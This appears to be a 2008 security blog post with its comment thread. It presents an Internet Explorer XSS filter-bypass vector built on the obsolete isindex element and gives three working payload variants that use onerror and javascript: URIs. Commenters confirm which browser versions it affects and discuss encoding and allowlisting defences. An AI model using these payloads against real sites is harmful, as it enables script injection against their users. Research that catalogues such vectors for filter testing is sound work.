Yes a XSS post again. I’m sorry 
I’ve been having fun testing some really good filters (some of the best in the business IMO). I found a vector that isn’t on rsnake’s cheat sheet. Check it out:-
Only works on IE
<isindex type=image src=1 onerror=alert(1)>
Because IE treats the isindex element (a very old html element) as a input tag you can specify the same attributes and execute javascript.
Update…
Found another variation which is pretty cool:-
<isindex action=javascript:alert(1) type=image>
Comments 8
You can remove the value of src attribute:
<isindex type=image onerror=alert(1) src=>
(only tested on IE6)
Did you ask to rsnake to add this vector ?
Posted 26 Aug 2008 at 9:16 pm ¶Also works in IE8
I’ll email him
Posted 26 Aug 2008 at 9:25 pm ¶Emailed rsnake but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned
Posted 26 Aug 2008 at 9:54 pm ¶hi Gareth Heyes
good job
Posted 27 Aug 2008 at 5:17 am ¶it work in ie6/7/8
If only everyone had the power of
ESAPI.encoder().encodeForHTMLAttribute(String userData);
Great find, good job!
Posted 27 Aug 2008 at 10:56 pm ¶@jim
Hey jim thanks, why don’t you put a online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is
Posted 28 Aug 2008 at 10:48 am ¶Hi,
I have an idea, for protecting websites against XSS attacks. Why not ban all the tags, and allow only predefined ones with ’special’ care. Like, allow img only with src that starts with a http://, or allow a href but only if http https is found.
Posted 29 Aug 2008 at 7:51 am ¶Also works in IE8. thx
Posted 10 Nov 2008 at 11:53 am ¶Post a Comment